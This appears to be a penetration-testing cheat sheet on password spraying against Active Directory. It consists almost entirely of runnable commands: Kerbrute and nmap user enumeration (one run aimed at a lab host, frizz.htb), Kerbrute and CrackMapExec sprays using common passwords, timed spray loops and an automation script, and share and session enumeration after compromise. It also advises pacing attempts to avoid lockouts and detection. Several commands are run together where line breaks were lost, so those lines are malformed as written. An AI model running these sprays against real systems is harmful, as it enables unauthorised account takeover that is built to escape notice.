5.Password Spraying Overview
1. User Enumeration with Kerbrute
# Using a predefined username list
kerbrute userenum --dc <domain-controller> -d <domain> usernames.txt
# Using a generated username list (GUIDs example)
for x in {{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}}; do echo $x; done > usernames.txtnmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm=frizz.htb 10.10.11.60
2. Password Spraying with Kerbrute
kerbrute passwordspray --dc <domain-controller> -d <domain> -U usernames.txt -p <common-password>3. Password Spraying with CrackMapExec (CME)
cme smb <target-ip> -u usernames.txt -p <password> --no-bruteforce4. Obtaining Password Policy (if internal access is available)
net accounts
Get-ADDefaultDomainPasswordPolicy5. Delay Consideration Between Sprays (Bash Example)
for password in Welcome1 Passw0rd Winter2022; do
cme smb <target-ip> -u usernames.txt -p $password --no-bruteforce
sleep 1800 # Wait 30 minutes to avoid account lockouts
done6. Handling Large User Lists (Bash Example)
split -l 1000 usernames.txt user_chunk_
for file in user_chunk_*; do
kerbrute passwordspray --dc <domain-controller> -d <domain> -U $file -p <password>
sleep 1800
done7. Post-Spray Enumeration
cme smb <target-ip> -u <username> -p <password> --shares
cme smb <target-ip> -u <username> -p <password> --sessions8. Automation (Basic Script)
#!/bin/bash
PASSWORDS=(Welcome1 Passw0rd Winter2022)
for password in "${PASSWORDS[@]}"; do
kerbrute passwordspray --dc <domain-controller> -d <domain> -U usernames.txt -p $password
sleep 1800
doneNotes:
- Adjust delay times based on password policy.
- Always confirm the password policy before attempting spraying.
- Use minimal attempts to avoid detection and lockouts.
Last updated